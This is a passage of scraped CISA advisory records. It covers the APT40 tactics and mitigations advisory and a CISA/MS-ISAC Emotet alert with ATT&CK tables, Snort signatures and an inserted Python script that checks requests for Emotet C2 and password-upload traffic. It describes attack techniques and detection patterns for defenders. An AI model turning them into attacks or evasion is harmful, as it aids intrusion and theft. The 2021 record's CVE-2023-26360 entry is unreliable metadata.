tactics and techniques._\n\nAPT40 [[G0065](<https://attack.mitre.org/groups/G0065/>)] has used a variety of tactics and techniques and a large library of custom and open-source malware\u2014much of which is shared with multiple other suspected Chinese groups\u2014to establish initial access via user and administrator credentials, enable lateral movement once inside the network, and locate high value assets in order to exfiltrate data. Table 1 provides details on these tactics and techniques. 
**Note:** see the appendix for a list of the domains, file names, and malware MD5 hash values used to facilitate this activity.\n\n_Table 1: APT40 ATT&CK Tactics and Techniques_\n\n**Tactics** | **Activities and Techniques** \n---|--- \n_ Reconnaissance_ [[TA0043](<https://attack.mitre.org/versions/v9/tactics/TA0043/>)] \nand \n_ Resource Development_ [[TA0042](<https://attack.mitre.org/versions/v9/tactics/TA0042/>)] | \n\n * Gather victim identity information [[T1589](<https://attack.mitre.org/versions/v9/techniques/T1589/>)] by collecting compromised credentials [[T1589.001](<https://attack.mitre.org/versions/v9/techniques/T1589/001/>)] \n * Acquire infrastructure [[T1583](<https://attack.mitre.org/versions/v9/techniques/T1583>)] to establish domains that impersonate legitimate entities [[T1583.001](<https://attack.mitre.org/versions/v9/techniques/T1583/001>)], aka \u2018typosquatting\u2019, to use in watering hole attacks and as command and control (C2) [[TA0011](<https://attack.mitre.org/versions/v9/tactics/TA0011>)] infrastructure\n * Establish new [[T1585.002](<https://attack.mitre.org/versions/v9/techniques/T1585/002>)] and compromise existing [[T1586.002](<https://attack.mitre.org/versions/v9/techniques/T1586/002>)] email and social media accounts [[T1585.001](<https://attack.mitre.org/versions/v9/techniques/T1585/001>)] to conduct social engineering attacks \n_ Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v9/tactics/TA0001/>)] | \n\n * External remote services (e.g., virtual private network [VPN] services) [[T1133](<https://attack.mitre.org/versions/v9/techniques/T1133>)]\n * Spearphishing emails with malicious attachments [[T1566.001](<https://attack.mitre.org/versions/v9/techniques/T1566/001>)] and links [[T1566.002](<https://attack.mitre.org/versions/v9/techniques/T1566/002>)]\n * Drive-by compromises [[T1189](<https://attack.mitre.org/versions/v9/techniques/T1189>)] and exploitation of public-facing applications 
[[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)]\n * Access to valid [[T1078](<https://attack.mitre.org/versions/v9/techniques/T1078>)], compromised administrative [[T1078.001](<https://attack.mitre.org/versions/v9/techniques/T1078/001>)] accounts \n_ Execution_ [[TA0002](<https://attack.mitre.org/versions/v9/tactics/TA0002>)] | \n\n * Command and scripting interpreters [[T1059](<https://attack.mitre.org/versions/v9/techniques/T1059>)] such as PowerShell [[T1059.001](<https://attack.mitre.org/versions/v9/techniques/T1059/001/>)]\n * Exploitation of software vulnerabilities in client applications to execute code [[T1203](<https://attack.mitre.org/versions/v9/techniques/T1203/>)] using lure documents that dropped malware exploiting various Common Vulnerabilities and Exposures (CVEs)\n * User execution [[T1204](<https://attack.mitre.org/versions/v9/techniques/T1204/>)] of malicious files [[T1204.002](<https://attack.mitre.org/versions/v9/techniques/T1204/002/>)] and links [[T1566.002](<https://attack.mitre.org/versions/v9/techniques/T1566/002>)] attached to spearphishing emails [[T1566.001](<https://attack.mitre.org/versions/v9/techniques/T1566/001>)] \n_ Persistence _[[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)]_, \nPrivilege Escalation_ [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)]_, \nCredential Access _[[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006/>)]_, \nDiscovery _[[TA0007](<https://attack.mitre.org/versions/v9/tactics/TA0007>)]_,_ \nand \n_ Lateral Movement _[[TA0008](<https://attack.mitre.org/versions/v9/tactics/TA0008>)] | \n\nAPT40 has used a combination of tool frameworks and malware to establish persistence, escalate privileges, map, and move laterally on victim networks. 
Additionally, APT40 conducted internal spearphishing attacks [[T1534](<https://attack.mitre.org/versions/v9/techniques/T1534>)].\n\n * BADFLICK/Greencrash\n * China Chopper [[S0020](<https://attack.mitre.org/versions/v9/software/S0020/>)]\n * Cobalt Strike [[S0154](<https://attack.mitre.org/versions/v9/software/S0154/>)]\n * Derusbi/PHOTO [[S0021](<https://attack.mitre.org/versions/v9/software/S0021/>)]\n * Gh0stRAT [[S0032](<https://attack.mitre.org/versions/v9/software/S0032/>)]\n * GreenRAT\n * jjdoor/Transporter\n * jumpkick\n * Murkytop (`mt.exe`) [[S0233](<https://attack.mitre.org/versions/v9/software/S0233/>)]\n * NanHaiShu [[S0228](<https://attack.mitre.org/versions/v9/software/S0228/>)]\n * Orz/AirBreak [[S0229](<https://attack.mitre.org/versions/v9/software/S0229/>)]\n * PowerShell Empire [[S0363](<https://attack.mitre.org/versions/v9/software/S0363/>)]\n * PowerSploit [[S0194](<https://attack.mitre.org/versions/v9/software/S0194/>)]\n * Server software component: Web Shell [[T1505.003](<https://attack.mitre.org/versions/v9/techniques/T1505/003/>)] \n_ Defense Evasion _[[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005/>)]_, \nCommand and Control _[[TA0011](<https://attack.mitre.org/versions/v9/tactics/TA0011>)]_, \nCollection _[[TA0009](<https://attack.mitre.org/versions/v9/tactics/TA0009>)]_,_ \nand \n_ Exfiltration _[[TA0010](<https://attack.mitre.org/versions/v9/tactics/TA0010>)] | \n\n * Use of steganography [[T1027.003](<https://attack.mitre.org/versions/v9/techniques/T1027/003>)] to hide stolen data inside other files stored on GitHub\n * Protocol impersonation [[T1001.003](<https://attack.mitre.org/versions/v9/techniques/T1001/003>)] by using Application Programming Interface (API) keys for Dropbox accounts in commands to upload stolen data to make it appear that the activity was a legitimate use of the Dropbox service\n * Protocol tunneling [[T1572](<https://attack.mitre.org/versions/v9/techniques/T1572>)] and multi-hop proxies 
[[T1090.003](<https://attack.mitre.org/versions/v9/techniques/T1090/003>)], including the use of Tor [[S0183](<https://attack.mitre.org/versions/v9/software/S0183/>)]\n * Use of domain typosquatting for C2 infrastructure [[T1583.001](<https://attack.mitre.org/versions/v9/techniques/T1583/001>)]\n * Archive [[T1560](<https://attack.mitre.org/versions/v9/techniques/T1560>)], encrypt [[T1532](<https://attack.mitre.org/versions/v9/techniques/T1532>)], and stage collected data locally [[T1074.001](<https://attack.mitre.org/versions/v9/techniques/T1074/001>)] and remotely [[T1074.002](<https://attack.mitre.org/versions/v9/techniques/T1074/002>)] for exfiltration\n * Exfiltration over C2 channel [[T1041](<https://attack.mitre.org/versions/v9/techniques/T1041>)] \n \n### Mitigations\n\n#### **Network Defense-in-Depth**\n\nProper network defense-in-depth and adherence to information security best practices can assist in mitigating the threat and reducing the risk. The following guidance may assist organizations in developing network defense procedures.\n\n##### **_Patch and Vulnerability Management_**\n\n * Install vendor-provided and verified patches on all systems for critical vulnerabilities, prioritizing timely patching of internet-connected servers and software processing internet data\u2014such as web browsers, browser plugins, and document readers.\n * Ensure proper mitigating steps or compensating controls are implemented for vulnerabilities that cannot be patched in a timely manner.\n * Maintain up-to-date antivirus signatures and engines.\n * Routinely audit configuration and patch management programs to ensure the ability to track and mitigate emerging threats. 
Implementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors\u2019 operations and protect resources and information systems.\n * Review the articles in the References section for more information on Chinese APT exploitation of common vulnerabilities.\n\n##### **_Protect Credentials_**\n\n * Strengthen credential requirements, regularly change passwords, and implement multi-factor authentication to protect individual accounts, particularly for webmail and VPN access and for accounts that access critical systems. Do not reuse passwords for multiple accounts. \n * Audit all remote authentications from trusted networks or service providers.\n * Detect mismatches by correlating credentials used within internal networks with those employed on external-facing systems.\n * Log use of system administrator commands such as `net`, `ipconfig`, and `ping`.\n * Enforce principle of least privilege.\n\n##### **_Network Hygiene and Monitoring_**\n\n * Actively scan and monitor internet-accessible applications for unauthorized access, modification, and anomalous activities. \n * Actively monitor server disk use and audit for significant changes.\n * Log Domain Name Service (DNS) queries and consider blocking all outbound DNS requests that do not originate from approved DNS servers. Monitor DNS queries for C2 over DNS.\n * Develop and monitor the network and system baselines to allow for the identification of anomalous activity. 
Audit logs for suspicious behavior.\n * Identify and suspend access of users exhibiting unusual activity.\n * Use allowlist or baseline comparison to monitor Windows event logs and network traffic to detect when a user maps a privileged administrative share on a Windows system.\n * Leverage multi-sourced threat-reputation services for files, DNS, URLs, IP addresses, and email addresses.\n * Network device management interfaces\u2014such as Telnet, Secure Shell (SSH), Winbox, and HTTP\u2014should be turned off for wide area network (WAN) interfaces and secured with strong passwords and encryption when enabled.\n * When possible, segment critical information on air-gapped systems. Use strict access control measures for critical data. \n\n### APPENDIX: APT40 Indicators of Compromise\n\nAPT40 used the following domains, file names, and malware MD5 hash values to facilitate the CNE activity outlined in this CSA between 2009 through 2018.\n\n#### **MD5 Malware Hashes**\n\n_(Updated July 19, 2021)_ **Note:** to uncover malicious activity, incident responders search for indicators of compromise (IOCs) in network- and host-based artifacts and assess the results\u2014eliminating false positives during the assessment. For example, some MD5 IOCs in the table below identify legitimate tools\u2014such as PuTTY, cmd.exe, svchost.exe, etc.\u2014as indicators of compromise. Although the tools themselves are not malicious, APT40 attackers placed and used them from non-standard folders on victim systems during computer intrusion activity. If a legitimate tool is identified by an incident responder, then the location of the tool should be assessed to eliminate false positives or to uncover malicious activity. 
See [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) for more incident handling guidance.\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. 
To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov> \"Email CISA Central\" ).\n\n### References\n\n[DOJ Press Release](<https://www.justice.gov/opa/pr/four-chinese-nationals-working-ministry-state-security-charged-global-computer-intrusion>)\n\n[Talos Intelligence: China Chopper Still Active 9 Years Later](<https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html?m=1>)\n\n[CISA China Cyber Threat Overview webpage ](<https://us-cert.cisa.gov/china>)\n\n[CISA Alert TA15-314A: Compromised Web Servers and Web Shells - Threat Awareness and Guidance ](<https://us-cert.cisa.gov/ncas/alerts/TA15-314A>)\n\n[CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/AA20-133a>)\n\n[CISA Alert AA20-275A: Potential for China Cyber Response to Heightened U.S.-China Tensions ](<https://us-cert.cisa.gov/ncas/alerts/AA20-275A>)\n\n[NSA Cybersecurity Advisory U/OO/179811-20: Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities ](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)\n\n### Revisions\n\nJuly 19, 2021: Initial version|Updated July 19, 2021: Added note and STIX file\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2021-07-20T12:00:00", "type": "ics", "title": "Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China\u2019s MSS Hainan State Security Department", "bulletinFamily": "info", "cvss2": {"severity": 
"MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2021-07-20T12:00:00", "id": "AA21-200A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-200a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T13:04:38", "description": "### Summary\n\n_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\nThis product was written by the Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC).\n\nEmotet\u2014a sophisticated Trojan commonly functioning as a downloader or dropper of other malware\u2014resurged in July 2020, after a dormant period that began in February. Since August, CISA and MS-ISAC have seen a significant increase in malicious cyber actors targeting state and local governments with Emotet phishing emails. 
This increase has rendered Emotet one of the most prevalent ongoing threats.\n\nTo secure against Emotet, CISA and MS-ISAC recommend implementing the mitigation measures described in this Alert, which include applying protocols that block suspicious attachments, using antivirus software, and blocking suspicious IPs.\n\n### Technical Details\n\nEmotet is an advanced Trojan primarily spread via phishing email attachments and links that, once clicked, launch the payload (_Phishing: Spearphishing Attachment_ [[T1566.001](<https://attack.mitre.org/versions/v7/techniques/T1566/001/>)], _Phishing: Spearphishing Link_ [[T1566.002](<https://attack.mitre.org/versions/v7/techniques/T1566/002/>)]). The malware then attempts to proliferate within a network by brute forcing user credentials and writing to shared drives (_Brute Force: Password Guessing_ [[T1110.001](<https://attack.mitre.org/versions/v7/techniques/T1110/001/>)], _Valid Accounts: Local Accounts_ [[T1078.003](<https://attack.mitre.org/versions/v7/techniques/T1078/003/>)], _Remote Services: SMB/Windows Admin Shares_ [[T1021.002](<https://attack.mitre.org/versions/v7/techniques/T1021/002/>)]).\n\nEmotet is difficult to combat because of its \u201cworm-like\u201d features that enable network-wide infections. Additionally, Emotet uses modular dynamic-link libraries (DLLs) to continuously evolve and update its capabilities.\n\nSince July 2020, CISA has seen increased activity involving Emotet-associated indicators. During that time, CISA\u2019s EINSTEIN Intrusion Detection System, which protects federal, civilian executive branch networks, has detected roughly 16,000 alerts related to Emotet activity. CISA observed Emotet being executed in phases during possible targeted campaigns. Emotet used compromised Word documents (.doc) attached to phishing emails as initial insertion vectors. 
Possible command and control network traffic involved `HTTP POST` requests to Uniform Resource Identifiers (URIs) consisting of nonsensical random length alphabetical directories to known Emotet-related domains or IPs with the following user agent string (_Application Layer Protocol: Web Protocols_ [[T1071.001](<https://attack.mitre.org/versions/v7/techniques/T1071/001/>)]).\n\n`Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; .NET CLR`\n\nTraffic to known Emotet-related domains or IPs occurred most commonly over ports 80, 8080, and 443. In one instance, traffic from an Emotet-related IP attempted to connect to a suspected compromised site over port 445, possibly indicating the use of Server Message Block exploitation frameworks along with Emotet (_Exploitation of Remote Services_ [[T1210](<https://attack.mitre.org/versions/v7/techniques/T1210/>)]). Figure 1 lays out Emotet\u2019s use of enterprise techniques.\n\n_Figure 1: MITRE ATT&CK enterprise techniques used by Emotet_\n\n#### Timeline of Activity\n\nThe following timeline identifies key Emotet activity observed in 2020.\n\n * **February**: Cybercriminals targeted non-U.S. countries using COVID-19-themed phishing emails to lure victims to download Emotet.[[1](<https://www.bleepingcomputer.com/news/security/emotet-malware-strikes-us-businesses-with-covid-19-spam/>)]\n * **July**: Researchers spotted emails with previously used Emotet URLs, particularly those used in the February campaign, targeting U.S. businesses with COVID-19-themed lures.[[2](<https://www.bleepingcomputer.com/news/security/emotet-malware-strikes-us-businesses-with-covid-19-spam/>)]\n * **August**: \n * Security researchers observed a 1,000 percent increase in downloads of the Emotet loader. 
Following this change, antivirus software firms adjusted their detection heuristics to compensate, leading to decreases in observed loader downloads.[[3](<https://www.hornetsecurity.com/en/security-information/emotet-update-increases-downloads/>)] \n * Proofpoint researchers noted mostly minimal changes in most tactics and tools previously used with Emotet. Significant changes included: \n * Emotet delivering Qbot affiliate `partner01` as the primary payload and\n * The Emotet mail sending module\u2019s ability to deliver benign and malicious attachments.[[4](<https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return>)]\n * CISA and MS-ISAC observed increased attacks in the United States, particularly cyber actors using Emotet to target state and local governments.\n * **September**: \n * Cyber agencies and researchers alerted the public of surges of Emotet, including compromises in Canada, France, Japan, New Zealand, Italy, and the Netherlands. Emotet botnets were observed dropping Trickbot to deliver ransomware payloads against some victims and Qakbot Trojans to steal banking credentials and data from other targets.[[5](<https://www.zdnet.com/article/france-japan-new-zealand-warn-of-sudden-spike-in-emotet-attacks/>)],[[6](<https://www.bleepingcomputer.com/news/security/france-warns-of-emotet-attacking-companies-administration/>)],[[7](<https://www.welivesecurity.com/2020/09/16/emotet-quebec-department-justice-eset/>)],[[8](<https://www.zdnet.com/article/microsoft-italy-and-the-netherlands-warn-of-increased-emotet-activity/>)]\n * Security researchers from Microsoft identified a pivot in tactics from the Emotet campaign. The new tactics include attaching password-protected archive files (e.g., Zip files) to emails to bypass email security gateways. 
These email messages purport to deliver documents created on mobile devices to lure targeted users into enabling macros to \u201cview\u201d the documents\u2014an action which actually enables the delivery of malware.[[9](<https://www.bleepingcomputer.com/news/security/emotet-double-blunder-fake-windows-10-mobile-and-outdated-messages/>)]\n * Palo Alto Networks reported cyber actors using thread hijacking to spread Emotet. This attack technique involves stealing an existing email chain from an infected host to reply to the chain\u2014using a spoofed identity\u2014and attaching a malicious document to trick recipients into opening the file.[[10](<https://unit42.paloaltonetworks.com/emotet-thread-hijacking/>)]\n\n### MITRE ATT&CK Techniques\n\nAccording to MITRE, [Emotet](<https://attack.mitre.org/versions/v7/software/S0367/>) uses the ATT&CK techniques listed in table 1.\n\n_Table 1: ATT&CK techniques used by Emotet_\n\nTechnique | Use \n---|--- \n_OS Credential Dumping: LSASS Memory_ [[T1003.001](<https://attack.mitre.org/versions/v7/techniques/T1003/001/>)] | Emotet has been observed dropping password grabber modules including Mimikatz. \n_Remote Services: SMB/Windows Admin Shares_ [[T1021.002](<https://attack.mitre.org/versions/v7/techniques/T1021/002/>)] | Emotet leverages the Admin$ share for lateral movement once the local admin password has been brute forced. \n_Obfuscated Files or Information_ [[T1027](<https://attack.mitre.org/versions/v7/techniques/T1027/>)] | Emotet has obfuscated macros within malicious documents to hide the URLs hosting the malware, `cmd.exe` arguments, and PowerShell scripts. \n_Obfuscated Files or Information: Software Packing_ [[T1027.002](<https://attack.mitre.org/versions/v7/techniques/T1027/002/>)] | Emotet has used custom packers to protect its payloads. \n_Network Sniffing_ [[T1040](<https://attack.mitre.org/versions/v7/techniques/T1040/>)] | Emotet has been observed to hook network APIs to monitor network traffic. \n_Exfiltration Over C2 Channel_ [[T1041](<https://attack.mitre.org/versions/v7/techniques/T1041/>)] | Emotet has been seen exfiltrating system information stored within cookies sent within an `HTTP GET` request back to its command and control (C2) servers. \n_Windows Management Instrumentation_ [[T1047](<https://attack.mitre.org/versions/v7/techniques/T1047/>)] | Emotet has used WMI to execute `powershell.exe`. \n_Process Injection: Dynamic-link Library Injection_ [[T1055.001](<https://attack.mitre.org/versions/v7/techniques/T1055/001/>)] | Emotet has been observed injecting into `Explorer.exe` and other processes. \n_Process Discovery_ [[T1057](<https://attack.mitre.org/versions/v7/techniques/T1057/>)] | Emotet has been observed enumerating local processes. \n_Command and Scripting Interpreter: PowerShell_ [[T1059.001](<https://attack.mitre.org/versions/v7/techniques/T1059/001/>)] | Emotet has used PowerShell to retrieve the malicious payload and download additional resources like Mimikatz. \n_Command and Scripting Interpreter: Windows Command Shell_ [[T1059.003](<https://attack.mitre.org/versions/v7/techniques/T1059/003/>)] | Emotet has used `cmd.exe` to run a PowerShell script. \n_Command and Scripting Interpreter: Visual Basic_ [[T1059.005](<https://attack.mitre.org/versions/v7/techniques/T1059/005/>)] | Emotet has sent Microsoft Word documents with embedded macros that will invoke scripts to download additional payloads. \n_Valid Accounts: Local Accounts_ [[T1078.003](<https://attack.mitre.org/versions/v7/techniques/T1078/003/>)] | Emotet can brute force a local admin password, then use it to facilitate lateral movement. \n_Account Discovery: Email Account_ [[T1087.003](<https://attack.mitre.org/versions/v7/techniques/T1087/003/>)] | Emotet has been observed leveraging a module that can scrape email addresses from Outlook. \n_Brute Force: Password Guessing_ [[T1110.001](<https://attack.mitre.org/versions/v7/techniques/T1110/001/>)] | Emotet has been observed using a hard-coded list of passwords to brute force user accounts. \n_Email Collection: Local Email Collection_ [[T1114.001](<https://attack.mitre.org/versions/v7/techniques/T1114/001/>)] | Emotet has been observed leveraging a module that scrapes email data from Outlook. \n_User Execution: Malicious Link_ [[T1204.001](<https://attack.mitre.org/versions/v7/techniques/T1204/001/>)] | Emotet has relied upon users clicking on a malicious link delivered through spearphishing. \n_User Execution: Malicious File_ [[T1204.002](<https://attack.mitre.org/versions/v7/techniques/T1204/002/>)] | Emotet has relied upon users clicking on a malicious attachment delivered through spearphishing. \n_Exploitation of Remote Services_ [[T1210](<https://attack.mitre.org/versions/v7/techniques/T1210/>)] | Emotet has been seen exploiting SMB via a vulnerability exploit like ETERNALBLUE ([MS17-010](<https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010>)) to achieve lateral movement and propagation. \n_Create or Modify System Process: Windows Service_ [[T1543.003](<https://attack.mitre.org/versions/v7/techniques/T1543/003/>)] | Emotet has been observed creating new services to maintain persistence. \n_Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder_ [[T1547.001](<https://attack.mitre.org/versions/v7/techniques/T1547/001/>)] | Emotet has been observed adding the downloaded payload to the `HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run` key to maintain persistence. \n_Scheduled Task/Job: Scheduled Task_ [[T1053.005](<https://attack.mitre.org/versions/v7/techniques/T1053/005/>)] | Emotet has maintained persistence through a scheduled task. \n_Unsecured Credentials: Credentials In Files_ [[T1552.001](<https://attack.mitre.org/versions/v7/techniques/T1552/001/>)] | Emotet has been observed leveraging a module that retrieves passwords stored on a system for the current logged-on user. \n_Credentials from Password Stores: Credentials from Web Browsers_ [[T1555.003](<https://attack.mitre.org/versions/v7/techniques/T1555/003/>)] | Emotet has been observed dropping browser password grabber modules. \n_Archive Collected Data_ [[T1560](<https://attack.mitre.org/versions/v7/techniques/T1560/>)] | Emotet has been observed encrypting the data it collects before sending it to the C2 server. \n_Phishing: Spearphishing Attachment_ [[T1566.001](<https://attack.mitre.org/versions/v7/techniques/T1566/001/>)] | Emotet has been delivered by phishing emails containing attachments. \n_Phishing: Spearphishing Link_ [[T1566.002](<https://attack.mitre.org/versions/v7/techniques/T1566/002/>)] | Emotet has been delivered by phishing emails containing links. \n_Non-Standard Port_ [[T1571](<https://attack.mitre.org/versions/v7/techniques/T1571/>)] | Emotet has used HTTP over ports such as 20, 22, 7080, and 50000, in addition to using ports commonly associated with HTTP/Hypertext Transfer Protocol Secure. \n_Encrypted Channel: Asymmetric Cryptography_ [[T1573.002](<https://attack.mitre.org/versions/v7/techniques/T1573/002/>)] | Emotet is known to use RSA keys for encrypting C2 traffic. 
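The C2 pattern described under Technical Details (POST requests to short, random alphabetical multi-directory URIs on ports 80, 8080 and 443 with the quoted user agent) and the two families of Snort rules in the Detection section that follows (the CISA `/wp-content/###/` and `/wp-admin/###/` GET rules, and the MS-ISAC multipart form-data browser-password upload rule) can be expressed as plain request checks that run over proxy or web-server records where Snort is not in the path. The following is an added example, not code from the CISA/MS-ISAC alert: the request record layout, the finding labels and the sample traffic are constructed for illustration, and the alphabetical-only directory constraint comes from the advisory's note rather than from the Snort `content` matches, which do not restrict the characters. Note that the MS-ISAC rule keys on port 443 and so only fires where TLS is terminated or inspected before the sensor.

```python
# Added example, not code from the CISA/MS-ISAC alert: the Emotet C2 heuristics
# described in this advisory applied to HTTP request records in pure Python.
# Record layout, finding labels and the sample requests are constructed here for
# illustration; tune the patterns before running against real proxy logs.
import re
from dataclasses import dataclass, field

# User agent quoted in the advisory (truncated there as well), matched on prefix.
EMOTET_UA_PREFIX = ('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; '
                    'Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729;')
EMOTET_C2_PORTS = {80, 8080, 443}

# Mirrors the CISA rules: short GET whose URI is /wp-content/ or /wp-admin/
# followed by one short directory (urilen < 17 and < 15 respectively).
# Letters only per the advisory note; the Snort content matches do not restrict this.
WP_URI_RE = re.compile(r'^/wp-(?:content|admin)/[A-Za-z]{1,3}/$')
# Mirrors the note in the Detection section: two or more purely alphabetical
# directory components and nothing else (no file name, no query string).
ALPHA_DIRS_RE = re.compile(r'^(?:/[A-Za-z]{3,})(?:/[A-Za-z]{3,})+/?$')
# Mirrors the MS-ISAC rule: a multipart field named like '<browser> passwords'.
BROWSER_PW_RE = re.compile(r':?(chrome|firefox|safari|opera|ie|edge) passwords', re.I)


@dataclass
class HttpRequest:
    method: str
    uri: str
    dst_port: int
    headers: dict = field(default_factory=dict)
    body: str = ''

    def header(self, name):
        # Header names are case-insensitive; normalise on lookup.
        for k, v in self.headers.items():
            if k.lower() == name.lower():
                return v
        return ''


def check_request(req):
    findings = []
    ua = req.header('User-Agent')
    keep_alive = req.header('Connection').lower() == 'keep-alive'

    if req.method == 'GET' and keep_alive and WP_URI_RE.match(req.uri):
        findings.append('wp-dir-get')
    if req.method == 'POST' and req.dst_port in EMOTET_C2_PORTS and ALPHA_DIRS_RE.match(req.uri):
        findings.append('alpha-dir-post')
    if ua.startswith(EMOTET_UA_PREFIX):
        findings.append('emotet-ua')

    ctype = req.header('Content-Type')
    if (req.method == 'POST'
            and ctype.startswith('multipart/form-data; boundary=')
            and 'Content-Disposition: form-data; name=' in req.body
            and '------WebKitFormBoundary' not in req.body   # browser-generated uploads excluded
            and 'Cookie:' not in req.body
            and BROWSER_PW_RE.search(req.body)):
        findings.append('browser-password-upload')
    return findings


def triage(requests):
    # Return only the requests that tripped something, with their findings.
    return [(r.uri, check_request(r)) for r in requests if check_request(r)]


Q = chr(34)  # double-quote character used in multipart part headers
SAMPLE_REQUESTS = [  # constructed sample traffic, not captured data
    HttpRequest('POST', '/xvqkdjw/mtrlpoa/', 8080,
                {'User-Agent': EMOTET_UA_PREFIX + ' .NET CLR 3.0.30729; Media Center PC 6.0)',
                 'Content-Type': 'application/x-www-form-urlencoded'},
                'data=AAAA'),
    HttpRequest('GET', '/wp-content/ab/', 80,
                {'User-Agent': 'Mozilla/5.0', 'Connection': 'Keep-Alive'}),
    HttpRequest('POST', '/upload', 443,
                {'Content-Type': 'multipart/form-data; boundary=----x9k2'},
                '------x9k2\r\nContent-Disposition: form-data; name=' + Q + 'Chrome Passwords' + Q
                + '\r\n\r\nuser:pass\r\n------x9k2--\r\n'),
    HttpRequest('GET', '/wp-content/themes/site/style.css', 80,
                {'User-Agent': 'Mozilla/5.0', 'Connection': 'Keep-Alive'}),
    HttpRequest('POST', '/api/v1/items', 443,
                {'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryAbc'},
                '------WebKitFormBoundaryAbc\r\nContent-Disposition: form-data; name=' + Q + 'file' + Q + '\r\n'),
]

if __name__ == '__main__':
    for uri, hits in triage(SAMPLE_REQUESTS):
        print(uri, hits)
```

The first three sample requests each trip one family of checks while the legitimate theme download and the browser-generated upload do not; in practice the `emotet-ua` and `alpha-dir-post` signals are weak on their own and are best combined with destination reputation, which the advisory's own Snort rules assume through their domain and IP context.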
\n \n### Detection\n\n#### Signatures\n\nMS-ISAC developed the following Snort signature for use in detecting network activity associated with Emotet activity.\n\n`alert tcp $HOME_NET any -> $EXTERNAL_NET 443 (msg:\"[CIS] Emotet C2 Traffic Using Form Data to Send Passwords\"; content:\"POST\"; http_method; content:\"Content-Type|3a 20|multipart/form-data|3b 20|boundary=\"; http_header; fast_pattern; content:\"Content-Disposition|3a 20|form-data|3b 20|name=|22|\"; http_client_body; content:!\"------WebKitFormBoundary\"; http_client_body; content:!\"Cookie|3a|\"; pcre:\"/:?(chrome|firefox|safari|opera|ie|edge) passwords/i\"; reference:url,cofense.com/flash-bulletin-emotet-epoch-1-changes-c2-communication/; sid:1; rev:2;)`\n\nCISA developed the following Snort signatures for use in detecting network activity associated with Emotet activity. **Note:** Uniform Resource Identifiers should contain a random length alphabetical multiple directory string, and activity will likely be over ports 80, 8080, or 443.\n\n`alert tcp any any -> any $HTTP_PORTS (msg:\"EMOTET:HTTP URI GET contains '/wp-content/###/'\"; sid:00000000; rev:1; flow:established,to_server; content:\"/wp-content/\"; http_uri; content:\"/\"; http_uri; distance:0; within:4; content:\"GET\"; nocase; http_method; urilen:<17; classtype:http-uri; content:\"Connection|3a 20|Keep-Alive|0d 0a|\"; http_header; metadata:service http;)`\n\n`alert tcp any any -> any $HTTP_PORTS (msg:\"EMOTET:HTTP URI GET contains '/wp-admin/###/'\"; sid:00000000; rev:1; flow:established,to_server; content:\"/wp-admin/\"; http_uri; content:\"/\"; http_uri; distance:0; within:4; content:\"GET\"; nocase; http_method; urilen:<15; content:\"Connection|3a 20|Keep-Alive|0d 0a|\"; http_header; classtype:http-uri; metadata:service http;)`\n\n### Mitigations\n\nCISA and MS-ISAC recommend that 